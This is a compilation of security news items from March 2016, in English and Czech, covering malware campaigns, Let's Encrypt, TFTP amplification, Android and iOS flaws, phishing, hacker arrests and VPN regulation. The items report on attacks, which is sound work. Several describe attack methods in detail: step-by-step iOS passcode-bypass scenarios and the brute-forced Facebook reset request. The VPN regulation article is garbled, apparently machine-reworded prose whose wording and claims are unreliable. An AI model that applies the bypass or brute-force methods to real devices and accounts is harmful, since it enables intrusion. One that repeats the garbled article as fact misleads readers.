So, now it's time for the Internet to take a significant step forward towards security and privacy. With Let's Encrypt, the team wants HTTPS becomes the default and to make that possible for everyone, it had built Let's Encrypt in such a way that it is easy to obtain and manage.


Brazilian underground is the first in spreading cross-platform malware
9.3.2016 Virus

Coder in the Brazilian Cyber Criminal underground are Pioneering Cross-platform malware relying on Java archive (JAR) Files.
Recently security experts at PaloAlto Networks uncovered a new family of ransomware dubbed KeRanger that targets Mac OS X users, a circumstance that demonstrates that every OS is potentially at risk.

Now researchers at Kaspersky Lab have discovered new families of malware that are being distributed as JAR Java executables to allow the malicious code to run on Mac, Linux, and Windows, and even on Android devices under special conditions.

The malware authors are packing the malicious code as a JAR file to develop cross-platform malware. Of course in order to run the code, it is necessary that the Java Runtime Environment (JRE) is installed on the target machine.

Fortunately for the crooks, Java is installed on 70-80% of machines worldwide, and Brazilian vxers seems to be aware of this.

“Brazilian Trojan Banker coders are now making Trojans running on all platforms and not only Windows.” wrote cyber threat experts from Kaspersky Dmitry Bestuzhev.

“Because Jar files run on Windows, OS X and Linux, wherever Java is installed. This is the very first step cybercriminals from Brazil have made towards “cross-platforming“.”

Kaspersky experts noticed that the Brazilian criminal underground is a pioneer in the development of cross-platform malware. The malware researchers also noticed that the new threats result from the development of distinct gangs in Brazil.

Kaspersky discovered several spam campaigns delivering malicious JAR files, or JAR files placed inside archives sent as attachments. These campaigns aimed to spread malicious codes, mainly banking trojan, named as Trojan-Banker.Java.Agent, Trojan-Downloader.Java.Banload, and Trojan-Downloader.Java.Agent.

Most infections have been observed in Brazil, followed by China and Germany.

cross-platform malware Brazil infections

Another aspect that makes these campaigns very insidious is that the cross-platform malware is stealthy and presents a low detection rate. These droppers are tiny pieces of code, with limited malicious features, for this reason they can easily evade detection and download on the infected machine other malware.

“Actually, the general detection rate for ALL AV vendors is extremely low.” continues the post. Cross-OS malware droppers are only the first step

The experts at Kaspersky highlighted that Brazilian coders have developed a cross-OS dropper at the moment used to spread older banking malware, but researchers believe cross-platform JAR-packed banking trojan is under development.

As Dmitry Bestuzhev, cyber threats researcher for Kaspersky, explains, this may only be a matter of time.

“Are Brazilian coders going to release full bankers – bandleaders and bankers running exclusively on Jar?” “There is no reason to believe they won’t. They have just started and they won’t stop.” states the post.


Let’s Encrypt has already issued one Million certificates
9.3.2016 Security

The Electronic Frontier Foundation announced that the Let’s Encrypt Certificate Authority issued its millionth certificate.
The open Certificate Authority (CA) Let’s Encrypt seems to be a success, the EFF is reaching its goals with the creation of this new certificate authority run by Internet Security Research Group (ISRG).

IT giants like Mozilla, Cisco, Akamai, Automattic and IdenTrust joined the initiative with the support of the Linux Foundation. The principal goal is to create a more secure web by encrypting website traffic using Transport Layer Security (TLS) and improve users’ privacy online.

The Let’s Encrypt CA issued its first certificate in September 2015, and today the EFF is proud to announce that Let’s Encrypt has issued its first million certificates.

“At 9:04am GMT today, the Let’s Encrypt Certificate Authority issued its millionth certificate. This is an amazing success, coming only 3 months and 5 days since a beta version of the service became publicly available. We’re very excited to be building a more secure and fully encrypted future for the World Wide Web.” states the Electronic Frontier Foundation.

Let's Encrypt has issued its first million certificates
The result is rousing if we consider that 90 percent of the 2.5 million domain names that take advantage of digital certificates issued by Let’s Encrypt had never been reachable by browser-valid HTTPS before.

The principal problems in implementing a HTTPs for each domain are the costs and the effort necessary to install the certificate. The Let’s Encrypt initiative aims to overwhelm these issues by issuing free digital certificates and by automating each phase of the lifecycle of a digital certificate.

The Let’s Encrypt has been a driving force for other similar initiatives, Amazon also started offering free certificates too.

There are other aspects to consider when dealing with Let’s Encrypt certificates, certificates are valid for only 90 days, this means that some website operators might forget to renew their certificates in due time.
“Unlike other CAs that issue certificates that don’t expire for years, LE is issuing short-lived certificates (90 days). All certificates are being published to the Certificate Transparency (CT) project, and you can see them at the crt.sh site.” explained David Holmes from F5 Networks.

Anyway let me say that I’m very happy for the results obtained by the Let’s Encrypt initiative, this is the evidence that we are converging to greater awareness of the risks and the need to take the necessary measures to protect our security and privacy.


How to exploit TFTP protocol to launch powerful DDoS amplification attacks
9.3.2016 Computer Attack

A group of security researchers from the Edinburgh Napier University elaborated a new DDoS amplification technique relying on the TFTP protocol.
A group of security experts from the Edinburgh Napier University (Boris Sieklik, Richard Macfarlane and Prof. William Buchanan) have discovered a new vector for DDoS amplification attacks. Recently the security community has discovered several ways to launch powerful amplification attacks by exploiting misconfigured services such as DNS or Network Time Protocol (NTP), now experts have found a way to exploit also the TFTP protocol (Trivial File Transfer Protocol).

The experts discovered that attackers could exploit TFTP to obtain a significant amplification factor for their attack, and unfortunately the port scanning research conducted for the “Internet Census 2012 ” indicates the presence on the Internet of roughly 599,600 publicly open TFTP servers.

TFTP protocol to launch DDoS amplification attacks

The researchers contacted by El Reg confirmed that the techniques could allow obtaining an amplification factor equal to 60.

“The discovered vulnerability could allow hackers to use these publicly open servers to amplify their traffic, similarly to other DDoS amplification attacks like DNS amplification. If all specific conditions are met this traffic can be applied up to 60 times the original amount,” the researcher Boris Sieklik told El Reg.
“I also studied effects of this attack on different TFTP software implementations and found that most implementations automatically retransmit the same message up to six times, which also contributes to the amplification.”

The TFTP protocol (Trivial File Transfer Protocol) is a simplified version of FTP (File Transfer Protocol) mainly used in local area networks. TFTP is very simple to implement for this reason it is quite common to find TFTP server within organizations.

It is possible to transfer any file by using the TFTP protocol, to obtain the DDoS amplification effect an attacker can a specifically crafted request to the server with a forged return address that represents the address of the target. The response sent by the server is much bigger in size than the original request, obtaining in this way the amplification factor.

The numerous misconfigured services present on the Internet could allow to target a specific website with junk traffic composed of responses to forged web requests.

The researchers announced that they will publish the results of their discovery in the March edition of publisher Elsevier’s Computers & Security journal, it will also include indications to mitigate potential TFTP DDoS amplification attacks.


More than a billion Android devices are easy to hack
9.3.2016 Android

A large percentage of Android devices is affected by security vulnerabilities that could be exploited by attackers to easily gain a Root Access.
According to experts at TrendMicro a large percentage of Android devices in use today is affected by security vulnerabilities that could be exploited by attackers to easily gain a root access.

The attack allows an ill-intentioned to escalate the privileges of any code that is executed on a target device, however, this attack scenario sees an attacker having installed his malicious code onto the device in the first place. Android users need to be very careful of installing any mobile apps from untrusted sources.

Below the description provided by TrendMicro for the CVE-2016-0819 and CVE-2016-0805 flaws discovered by its experts:

CVE-2016-0819

We discovered this particular vulnerability, which is described as a logic bug when an object within the kernel is freed. A node is deleted twice before it is freed. This causes an information leakage and a Use After Free issue in Android. (UAF issues are well-known for being at the heart of exploits, particularly in Internet Explorer.)

CVE-2016-0805

This particular vulnerability lies in the function get_krait_evtinfo. (Krait refers to the processor core used by several Snapdragon processors). The function returns an index for an array; however, the validation of the inputs of this function are not sufficient. As a result, when the array krait_functionsis accessed by the functions krait_clearpmu and krait_evt_setup, an out-of-bounds access results. This can be useful as part of a multiple exploit attack.

Qualcomm Snapdragon systems on a chip Android devices

The problem affects the Qualcomm Snapdragon systems on a chip, more than a billion devices is at risk. The root access to a mobile device allows an attacker to conduct a number of malicious activities, from surveillance to financial frauds.

The vulnerability could be exploited by simply running a malicious app on snapdragon-powered Android devices. Experts at TrendMicro privately reported the security holes to Google that fixed them.

As usually happen in these cases, the high fragmentation of the Android market complicates the patch management process. Many users are still vulnerable to the attack waiting for a security patch.

“As the number of embedded SoCs in devices explode with the IoT growth, we anticipate that these kinds of vulnerabilities will become a bigger problem that will challenge the overall security posture of Internet of Things.” continues the post published by TrendMicro.

Going into technical details, the flaws could be exploited in every mobile and IoT devices that could allow the invocation of the system call perf_event_open. Fortunately, many vendors can have customized the kernel and SELinux policies in order to avoid the call.

According to the Nexus Security Bulletin – February 2016, the CVE-2016-0805 vulnerability affects versions earlier than 4.4.4 to 6.0.1, this means that Nexus 5, Nexus 6, Nexus 6P, Samsung Galaxy Note Edge are vulnerable to the attack.

“We believe that any Snapdragon-powered Android device with a 3.10-version kernel is potentially at risk of this attack. As mentioned earlier, given that many of these devices are either no longer being patched or never received any patches in the first place, they would essentially be left in an insecure state without any patch forthcoming.” conclude TrendMicro.


Bezpečnost u mobilních zařízení

9.3.2016 Mobilní
Mobilní zařízení (tablety a chytré telefony) patří k velice diskutovaným zařízením v dnešním IT prostředí, a to zejména s ohledem na masivní nárůst jejich využití, a na druhé straně k potřebám pro zajištění bezpečnosti při používání těchto zařízení v pracovním prostředí firem.

Uživatelé mobilních zařízení se samozřejmě snaží o maximální využití těchto zařízení i pro pracovní účely, firma ovšem potřebuje také zajistit, aby nedocházelo k ohrožení přístupu k ICT systémům a případnému úniku citlivých dat z firmy. Snahou firem je zavádění různých prostředků, které by měly výše uvedené hrozby eliminovat, tyto prostředky však bohužel poměrně jasně inklinují k tomu, aby se tato zařízení pro jejich uživatele víceméně „uzamkla“.

Nejde samozřejmě o uzamčení zařízení jako takového, ale spíše o limitování využití některých funkcí nebo aplikací, a tím se celkově omezuje uživatelské využití, a to i pro případ využití zařízení pro čistě soukromé účely. Bezpečnost by měla být chápána spíše jako podpůrný prvek pro využití těchto zařízení, a ne fungovat jako sada omezení, které uživateli bude nařizovat, jak může dané zařízení využívat.

Nárůst popularity mobilních zařízení samozřejmě přinesl nové příležitosti a inovační trendy, zatímco současně s tím se objevila také určitá rizika. Hlavním problémem je, že uživatel se s mobilním zařízením pohybuje kdekoli a značnou dobu je mimo dohled a prostory firmy, pro kterou pracuje. Zařízení přitom disponuje možností přihlášení do firemních systémů a možností čtení nebo stahování firemních dat přímo do zařízení. Přitom zařízení může být ukradeno či jinak zneužito, a systémy a data firmy se tak ocitají ve vážném ohrožení.

Další trend, který je v současnosti potřeba vzít do úvahy, je tzv. BYOD (Bring Your Own Device) – tedy situace, kdy si zaměstnanci firem přinášejí do zaměstnání svá vlastní mobilní zařízení (a to podle vlastního výběru a preferencí) a je jim v určité míře umožněno přistupovat k firemním systémům a aplikacím. Když si představíme, jaké operační systémy pro mobilní zařízení jsou na trhu k dispozici (Android, iOS, Windows, BlackBerry), pak je zřejmé, že úloha zajištění jejich bezpečnosti pro IT oddělení je skutečně nelehká. Přestože výrobci OS v poslední době udělali značný pokrok z hlediska možnosti centrální správy a dohledu nad mobilními zařízeními, ale některé tyto systémy se liší svými verzemi na trhu, a tím je centrální správa značně složitější.

Možná ohrožení

V důsledku snadné zranitelnosti se tak stávají mobilní zařízení centrem pozornosti hackerských aktivit více než kterákoli jiná zařízení. Podle zveřejněných statistik společnosti Gartner se očekává, že v roce 2017 bude připadat na tři útoky na mobilní zařízení jeden útok na běžný desktopový počítač.

Mezi známé typy útoků se řadí zejména phishing nebo pharming, jejichž cílem je získání a následné zneužití osobních dat nebo jiných citlivých údajů, které se následně použijí k neautorizovanému přístupu do různých systémů (typicky se může jednat o bankovní účty apod.).

Další potenciální hrozbou se mohou stát i veřejné hotspoty Wi-Fi sítí, kde se v důsledku bezpečnostních nedostatků může naskytnout útočníkům prostor pro sledování komunikace na daném mobilním zařízení, odchytávání hesel, získávání e-mailů apod.

Dalším zdrojem potenciálních problémů jsou cloudové služby, kdy uživatelé mohou z mobilního zařízení ukládat citlivá data například na privátní cloud nebo jiné nedůvěryhodné úložiště.

Velkou hrozbou jsou ale samotní uživatelé mobilních zařízení. Byť IT oddělení definuje určitá pravidla pro používání těchto zařízení a provede správnou konfiguraci přístroje, uživatelé se mnohdy snaží tyto politiky obcházet. A občas je to poměrně jednoduché, protože obchody s aplikacemi nabízejí různé drobné aplikace, které dokážou bezpečnostní funkce jednoduše odblokovat. Dalším úskalím je pak nemožnost kontroly uživatelů, kdy a jak ze svého mobilního zařízení klikají na problematické a nedůvěryhodné odkazy a zařízení si nakazí škodlivým SW (viry, malware apod.).

Přístupy při ochraně zařízení

Pojďme si nyní popsat některé možné bezpečnostní scénáře:

Blokování používání mobilního zařízení:jedním z přístupů bezpečnostní firemní politiky může být snaha o omezení použití mobilního zařízení pouze na dobu, kdy je zaměstnanec na pracovišti, po zbylou dobu by mělo být zařízení blokováno pro použití. Pro uživatele toto opatření příliš uspokojivé určitě není a spíše povede k situaci, že uživatel bude chtít pravidla obcházet anebo zařízení nebude využívat vůbec.

Snaha aplikovat tradiční bezpečnostní přístupy:Jedním z dalších přístupů zajištění bezpečnosti mobilních zařízení je snaha uplatnění stejných bezpečnostních technologií, které jsou používány pro přenosné počítače (filtrování URL adres, IPS, antimalware apod.). Tento přístup však příliš k uspokojivým výsledkům nevede. Jakmile totiž uživatel opustí perimetr firmy, ve které pracuje, nelze již technologii efektivně uplatnit (odlišné připojení k internetu apod.). U jiných technologií, které se instalují na koncová zařízení (antivirové program apod.), zase narážíme na slabý výpočetní výkon nebo výdrž baterie.

Použití softwaru pro správu mobilních zařízení: Jedná se o SW nástroj, který by měl pokrýt komplexní požadavky na správu mobilních zařízení, a to zejména instalaci, údržbu verzí a smazání aplikací, správu zabezpečení a pravidel využívání zařízení a jeho komunikačních/síťových služeb. Samozřejmostí by měla být možnost provedení vzdáleného SW auditu na daném zařízení. Takový SW nástroj by pak měl včas zachytit přítomnost nežádoucí aplikace (nebo i např. jailbreak) nebo nevhodnou konfiguraci zařízení. Na trhu je dnes skutečně široká škála produktů pro správu mobilních zařízení (obecně se tyto SW nástroje označují zkratkou MDM – Mobile Device Management). Většina z nich se obvykle specializuje na celou škálu OS mobilních zařízení. Řešení je postaveno obvykle na principu klient-server, kdy na mobilním zařízení běží agent komunikující se serverovou částí, kam odesílá relevantní informace a zpětně na mobilním telefon přijímá instrukce k provedení konkrétních operací.


Přinášíme detaily k prvnímu vyděračskému malwaru pro Macy

8.3.2016 Viry
Hackeři sice svůj plán nedotáhli do konce, dle všeho však chtěli uživatele Maců přimět k zaplacení desetitisícového výkupného.

Uživatelé Maců se ocitli v ohrožení prvním funkčním ransomwarem cílícím právě na ně. Podle bezpečnostních odborníků se jeho tvůrci snažili najít způsob, jak zašifrovat data, aby uživatele přiměli k zaplacení výkupného.

Zdá se však, že KeRanger, jak byl ransomware nazván, byl objeven o něco dřív, než tvůrci zamýšleli. Odborníci z bezpečnostní společnosti Palo Alto Networks na něj přišli v pátek, jen pár hodin poté, co se dostal do sítě.

Už v pátek odpoledne tak o svém objevu mohli zpravit Apple a společnost tak v neděli mohla anulovat digitální certifikát, který malware využíval k podepisování, a zároveň Transmission, bittorentový klient, který byl zdrojem nákazy, mohl stáhnout infikovanou verzi a vydat bezpečný update.

A i díky tomu, že KeRanger byl opatřen třídenní „inkubační dobou“, kterou potřeboval k tomu, než mohl začít škodit, znepříjemnil život jen hrstce uživatelů. Ti následně čelili rozhodnutí, zda obrečet zašifrovaná data, nebo zaplatit výkupné stanovené na jeden Bitcoin, tedy zhruba 10 tisíc korun.

mbice tvůrců KeRangeru přitom byly daleko vyšší než jen zablokování souborů aktuálně uložených na disku, ransomware měl šifrovat i data zálohovaná prostřednictvím nástroje Time Machine, který je součástí OS X a uživateli je hojně využíván. Přitom právě pravidelné zálohování je jedním z obranných mechanismů, jak se platbě výkupného vyhnout.

„Ransomware je velice výnosná záležitost,“ hodnotí Thomas Reed ze společnosti Malwarebytes. „Pro kyberzločince to je největší zdroj příjmů.“ Podle Reeda se tvůrci škodlivého softwaru na blokování záloh začali soustředit až v poslední době, přičemž zálohování prostřednictvím Time Machine je dle něj nechvalně známé svou křehkostí.

A není tak vyloučeno, že tvůrci KeRangeru měli v úmyslu zálohovaná data nejen zablokovat, ale rovnou zcela zničit. „Pokud Time Machine užíváte s rozumem, je to v pořádku. Jestliže si ale se zálohami pohráváte skrz jinou aplikaci, můžete se dostat do problémů,“ varuje. „Nejlepší variantou je mít záloh několik, ovšem k počítači mít připojenou v daný čas vždy jen jednu.“


Phishing u Seagate, útočníci získali daňové dokumenty W-2 tisíců zaměstnanců

8.3.2016 Phishing
Phishing u Seagate, útočníci získali daňové dokumenty W-2 tisíců zaměstnancůDnes, Milan Šurkala, aktualitaPhishing může někdy pěkně zatopit a občas se jediný útok může týkat tisíců lidí. To se nyní stalo společnosti Seagate, která díky chybě jednoho zaměstnance útočníkům poskytla daňové dokumenty W-2 mnoha tisíců zaměstnanců.
Společnost Seagate řeší zapeklitý problém. Firma se stala obětí phishingu, kdy útočníci poslali e-mail jménem CEO společnosti Stephena Lucza. V něm požadovali daňové dokumenty W-2 zaměstnanců společnosti. Poněvadž žádost vypadala jako pravá, jeden ze zaměstnanců odpověděl a údaje poslal. Bohužel nešlo o legitimní žádost a údaje mnoha tisíců zaměstnanců společnosti Seagate se tak dostaly do nepovolaných rukou.

Úplně stejnou techniku použili útočníci i minulý týden u Snapchatu (opět jménem CEO společnosti požadovali W-2 dokumenty zaměstnanců). Seagate nabídnul dotčeným zaměstnancům dvouleté bezplatné monitorování účtů. Je pravděpodobné, že útočníci chtějí využít tyto údaje k neoprávněnému získání peněz, které se budou vracet z daní.


Hacker Reveals How to Hack Any Facebook Account
8.3.2016 Hacking  Social Site
how-to-hack-facebook-account
Hacking Facebook account is one of the major queries of the Internet user today. It's hard to find the way to hack into someone Facebook account, but a Facebook user just did it.
A security researcher discovered a 'simple vulnerability' in the social network that allowed him to easily hack into any Facebook account, view message conversations, post anything, view payment card details and do whatever the real account holder can.
Facebook bounty hunter Anand Prakash from India recently discovered a Password Reset Vulnerability, a simple yet critical vulnerability that could have given an attacker endless opportunities to brute force a 6-digit code and reset any account's password.
Here's How the Flaw Works
The vulnerability actually resides in the way Facebook's beta domains handle 'Forgot Password' requests.
Facebook lets users change their account password through Password Reset procedure by confirming their Facebook account with a 6-digit code received via email or text message.
To ensure the genuinity of the user, Facebook allows the account holder to try up to a dozen codes before the account confirmation code is blocked due to the brute force protection that limits a large number of attempts.
However, Prakash discovered that the social media giant had not implemented rate-limiting in its password reset process on the beta sites, beta.facebook.com and mbasic.beta.facebook.com, according to a blog post published by Prakash.
Prakash tried to brute force the 6-digit code on the Facebook beta pages in the 'Forgot Password' window and discovered that there is no limit set by Facebook on the number of attempts for beta pages.
Video Demonstration
Prakash has also provided a proof-of-concept (POC) video demonstration that shows the attack in work. You can watch the video given below that will walk you through the entire procedure:

Here's the culprit:
As Prakash explained, the vulnerable POST request in the beta pages is:
lsd=AVoywo13&n=XXXXX
Brute forcing the 'n' successfully allowed Prakash to launch a brute force attack into any Facebook account by setting a new password, taking complete control of any account.
Prakash (@sehacure) discovered the vulnerability in February and reported it to Facebook on February 22. The social network fixed the issue the next day and had paid him $15,000 as a reward considering the severity and impact of the vulnerability.


Hackers and Cyber Experts to Come Together at NullCon 2016
8.3.2016 Safety
A crowd of IT professionals, cyber security experts, thought leaders and business decision makers along with the best minds in the hacking community will come together at annual Nullcon security conference 2016 under the same roof to join their efforts in addressing the most critical issues of the Internet Cyberspace.
NullCon, appropriately dubbed "The Next Security Thing", creates opportunities for both presenting as well as participating in an intimate atmosphere with cyber security events offering the opportunity to learn about new threats, get valuable insights from leading experts, and network with other professionals.
Who goes to the Nullcon Conference, and Why?
Delegates from across the globe will be exposing the latest in information security, new cyber attack vectors, solutions to complex security issues with practical scenarios, thought-provoking ideas and research from the luminaries in the global IT security industry.
Additionally, a number of white hat hackers will be giving talks on the latest cyber threats, and the game-changing cyber security technologies and services they're bringing to fight cyber crime.
The major topics to be presented at Nullcon Conference 2016 will include:
What Google knows about you and your devices, and how to get it
Practical OS X Malware Detection & Analysis
Privacy leaks on 4G-LTE networks
Automatic Automotive Hacking
Making Machines think about security for fun and profit
Million Dollar Baby: Towards ANGRly conquering DARPA CGC
Hitchhiker's Guide to Hacking Industrial Control Systems (ICS)
Abusing Software Defined Networks
NullCon also builds the right niche network for you, both for information as well as business purposes.
Besides security talks, NullCon also provides 2-day workshops and security training.
Even Job seekers including IT professionals, engineers, product marketers, and sales executives are attending Nullcon in hopes of getting face time with the CEOs, CIOs and CISOs who are seeking experienced cyber talent.
NullCon Conference 2016 will be held at Goa (India) on 9-12th March 2016. March 9-10th are assigned for workshops and security training, and 11-12th March will be for security and hacking sessions.


Hacker arrested for ATM Skimming escaped from Prison
8.3.2016 Hacking
Hacker arrested for ATM Skimming escaped Prison
A Romanian card skimmer arrested for being part of an international cybercrime group that used malware to plunder US$217,000 from ATMs has escaped from a Bucharest prison on Sunday morning (6th March).
Renato Marius Tulli, 34, was being held at Police Precinct 19 in Bucharest, the capital of Romania, after being arrested together with 7 other suspects as part of a joint Europol, Eurojust, and DIICOT investigation on January 5, 2016.
Tulli was part of a criminal gang specialized in robbing NCR-based ATMs.
According to the federal authorities, the gang allegedly used a piece of malware, dubbed Tyupkin, to conduct what's known as Jackpotting attack and made Millions by infecting ATMs across Europe and beyond.
Using Tyupkin malware, the criminals were able to empty cash from infected ATMs by issuing commands through the ATM's pin pad.
Authorities announced on Monday that Tulli escaped with Grosy Gostel, 38, a man held for robbery charges, while both of them and other prisoners were out in the precinct's yard taking their daily outdoor break, local media report.
Though Police caught Gostel, ATM malware man Tulli remains on the run.
The ATM hacker and robber managed to cut a hole in the police precinct's fence and then jumped an outer fence at the police station without being noticed by the two officers that were keeping watch.
The 2 Police officers that were on duty that day are now investigated on charges of negligence.
Tulli and his criminal gang raided ATMs between December 2014 and October 2015 in countries including Romania, Hungary, Spain, the Czech Republic, and Russia. Europol estimates the group caused damages to banks of around US$217,000 (€200,000).
Tyupkin malware the gang used has been upgraded in recent months. The malware is now dubbed as GreenDispenser and is being used to target ATMs across Mexico.


'Guccifer,' who Hacked former President, to be extradited to the US
8.3.2016 Hacking
Upon the request of US authorities, Marcel Lazar Lehel, well known as Guccifer, has finally been approved to extradite to the United States to face Computer Intrusion and Identity Theft Charges for 18 months.
Guccifer is an infamous Romanian hacker who was arrested in Romania for hacking into the emails and social networking accounts of numerous high profile the US and Romanian Politicians.
Romania's top court has approved a request by US authorities to extradite Guccifer to the United States, a source within Romania's DIICOT anti-organized crime and terrorism unit told Reuters.
Guccifer's well known political targets included:
Bill Clinton (Former President)
Hillary Clinton (U.S Presidential Candidate)
George W. Bush (Former U.S. President)
Colin Powell (former U.S. Secretary)
George Maior (chief of the Romanian Intelligence Service)
John Tenet (State Director of Central Intelligence for the United States CIA)
Richard Armitage (Republican politician)
Lisa Murkowski (U.S. Senator and former Secret Service Agent) and many more.
Guccifer rose into the popularity in 2013 after hacking into the email account of George W. Bush and leaking Bush's personal photographs and artwork, including two self-portraits: one in the shower and one in the bathtub.
The same hacker was responsible to crack into the AOL Account of Bush’s Sister, Dorothy Bush Koch and targeted a number of high-profile celebrities, including Nicole Kidman, Comedian Steve Martin, Actor Leonardo DiCaprio, Actress Mariel Hemingway, 'Sex and the City' author Candace Bushnell, Biographer Kitty Kelley, released some of Hillary Clinton's private emails and many more.
The 42-year-old hacker had also claimed that Bush was a member of Ku Klux Klan – a White Supremacist Racist group by the Anti-Defamation League and the Southern Poverty Law Center, allegedly having total 5,000 to 8,000 members.
This intensified leakage had caused many repercussions on many topics like the romantic relationships between Colin Powell and Corina Cretu (Romanian Politician), even though both denied the statement.
If you want to explore more about the Guccifer Leaks, you may visit the site named 'The Smoking Gun' to which he published the leaked contents (don't expect a Wikileaks model).
Guccifer was serving as a Taxi Driver when Romania's DIICOT anti-organized crime and terrorism unit arrested him. He kickstarted his career as a Hacker at the age of 35.
According to his wife, Guccifer did most of his hacking from the quiet Sâmbăteni, which is located in the Draculan Village Transylvania.
Guccifer was sentenced for intrusion charges to popular profiles by the Romanian court to four years in jail in 2014 "with the aim of getting ... confidential data" and is serving another three-year term for other offences.


How to bypass Apple Passcode in 9.1 and later
8.3.2016 Apple

A number of bypass vulnerabilities still affect iOS devices and could be exploited by an attacker to bypass the passcode authorization screen.
A number of bypass vulnerabilities still affect iOS devices and could be exploited by an attacker to bypass the passcode authorization screen on Apple mobile devices (iPhones and iPads) running iOS 9.0, 9.1, and the recent 9.2.1.

According to Benjamin Kunz Mejri, a researcher at Vulnerability Lab, this category of security holes can be exploited to access apps native to iOS, such as Clock, Event Calendar, and Siri’s User Interface.

In February, Benjamin Kunz Mejri discovered an authentication bypass-sized hole in both iPhones and iPads running iOS 8 and iOS 9 that can be exploited by attackers to thwart lock screen passcode.

“An application update loop that results in a pass code bypass vulnerability has been discovered in the official Apple iOS (iPhone5&6|iPad2) v8.x, v9.0, v9.1 & v9.2. The security vulnerability allows local attackers to bypass pass code lock protection of the apple iphone via an application update loop issue. The issue affects the device security when processing to request a local update by an installed mobile ios web-application.” states the technical description published by the vulnerability-lab.com.

The attacker can bring the iOS devices into an unlimited loop resulting in a temporarily deactivate of the pass code lock screen.

The real problem is that they are underestimated by manufacturers because the attack request the physical presence of the attackers which have to be in possession of the device, in the specific case the flaw is still present after it was reported three months ago (2016-01-03: Researcher Notification & Coordination (Benjamin Kunz Mejri – Evolution Security GmbH))

“The issue is not fixed after a three-month duration. We have the newest versions of iPad and iPhone and are still able to reproduce it after the updates with default configuration,” Mejri told Threatpost Monday.

This time Mejri described a number of attack vectors relying on an internal browser link request to skip the passcode screen.

In a first scenario, an attacker could request Siri to open an app that doesn’t exist, at this point Siri will open a restricted browser window to the App Store, but from there the attacker could switch back to the home screen, either via the home button, or via Siri.

apple passcode bypass

In the second scenario the attacker is using the control panel to gain access to the non restricted clock app. The attacker opens the app via siri or via panel and opens then the timer to the end timer or Radar module. The app allows users to buy more sounds for alerts and implemented a link, but if the attacker pushes the link a restricted app store browser window opens. At that point we are in the same situation of the first attack vector.

In the third scenario, the attacker opens via panel or by a Siri request the clock app. The internal world clock module includes in the bottom right is a link to the weather channel that redirects users to the store as far as its deactivated. By pushing the link also in this case a restricted appstore browser window opens.

“At that point it is possible to unauthorized switch back to the internal home screen by interaction with the home button or with siri again. The link to bypass the controls becomes visible in the World Clock (Weather Channel) and is an image as link. Thus special case is limited to the iPad because only in that models use to display the web world map. In the iPhone version the bug does not exist because the map is not displayed because of using a limited template. The vulnerability is exploitable in the Apple iPad2 with iOS v9.0, v9.1 & v9.2.1.” wrote Mejri.

In the fourth scenario the attacker opens via Siri the ‘App & Event Calender’ panel, then he opens under the Tomorrow task the ‘Information of Weather’ (Informationen zum Wetter – Weather Channel LLC) link on the left bottom. The weather app is deactivated on the Apple iOS device, a new browser window opens to the AppStore, at that point we are in the same scenario seen in the other point.

It’s unclear when Apple will fix the issues. it is possible that the flaws will be solved with the iOS 9.3.


International politics of the VPN regulation
8.3.2016 Safety

How VPN (virtual private networks) are being utilized for stimulation, legislative issues, and correspondence in various nations.
As information security guru Bruce Schneier and his Berkman Center for Internet and Society associates brought up in a report a week ago, there are currently around 865 encryption-related items accessible all around the globe. From voice encryption tools to free and premium VPNs, this business sector extends a long ways past the fringes of the United States. Today, the encryption economy incorporates no less than 55 distinctive nations crosswise over Europe, Latin America, the Asia-Pacific, and the Caribbean.

The sprawling environment of programming improvement makes a conspicuous issue for governments and security organizations trying to screen or contain the privacy software. Free programs and other dispersed undertakings commonly exist “on numerous servers, in different nations, all the while,” and organizations offering anonymous tools can relocate the borders over outskirts without breaking a sweat.

To those focusing already, none of this is news. Numerous onlookers likewise concur that authoritative regulation of encryption would be a dangerous endeavor. In any case, when in doubt, maybe we shouldn’t rush to accept that the Internet will dependably and definitely discover a route around the stumbling country state.

In the setting of the present talk, it merits remembering that administrations have numerous different choices available to them with regards to controlling the utilization of protection tools. While these choices are once in a while completely powerful as a regulation measure, they can have some impact with regards to dissuading new clients from taking up specific advancements.

We should take the instance of VPNs as a sample. Once a business organizing apparatus, the VPN has lately transformed into a membership based individual administration for online privacy, security and remote server access – getting to be a standout amongst the most easy to use appearances of protection tools. Governments around the globe are currently scrambling to stay aware of the quick take-up of VPNs and their assorted applications for customers, nationals, and crooks alike.

As a major aspect of a project having international research, a group of the digital media analysts have been following and looking at universal patterns in VPN use, society, and regulation. Throughout the most recent year, researchers have been concentrating how VPNs (and other security weapons) are being utilized for stimulation, legislative issues, and correspondence in various nations. The outcomes have been enlightening.

One of the rising subjects is that distinctive governments take diverse ways to deal with managing VPNs. In nations with solid Internet oversight, a typical technique is a blend of authoritative bans and system level squares. In China, home of the world’s most advanced Internet oversight framework, various VPN sites have been blocked from the net under the appearance of a crackdown on unlicensed telecoms administrations. VPN movement has been upset through profound bundle review and port blocking, as well. Comparable boycott and block-systems are set up in a few Gulf States, including Bahrain, Oman and Saudi Arabia, and in Pakistan. Reports recommend that Russia has been considering such a move.

On the other hand, elsewhere technical-blocks are being joined with more vindictive measures. The Freedom House reports that Syrian powers “have created fake Skype encryption devices and a fake VPN application, both containing hurtful Trojans.”

Furthermore, another turn on the story was as of late found in Iran, where the state has had a go at entering the VPN industry itself. As indicated by Small Media advocacy group, Iranian powers tested in 2013 with setting up their own “authority” VPNs. These VPNs were hyped to have connection with government yet worked superbly well to check Facebook or YouTube, inasmuch as clients were not put off by government reconnaissance.

vpn works

At that point obviously we have the entire issue of private regulation as stage level VPN blocking. Video administrations, for example, Netflix, Hulu, and BBC iPlayer—with variable levels of adequacy and eagerness—have all been utilizing outsider business programming for blocking access from IP addresses associated with being utilized by the VPNs.

What does this mean for the eventual fate of privacy software like VPNs?

The signs are blended. Tech liberationists are most likely right to demand that the circulated way of cryptography and encryption imply that tech groups will more often than not discover a path around top-down regulation. What’s more, administration suppliers have numerous alternatives in the progressing session of whack-a-mole, for example, exchanging locales, changing server runs, and imagining new workarounds.

In the meantime, we ought to be mindful so as not to accept that VPNs, voice scramblers, email encryption, or whatever other innovation items are totally past the limits of regulation at the purpose of utilization and in addition generation. Security organizations are a long way from weak in this diversion, particularly when the fundamental point is to dishearten uptake no matter how you look at it as opposed to stamp out use among techies.

At the end of the day, the country state still has a couple traps up its sleeve. The stakes of this verbal confrontation will just increment in the coming years as anonymization and security innovations enter further into the standard of tech society.


Nový firewall Cisco namísto omezování uživatelů sám vyhledává hrozby

8.3.2016 Zabezpečení
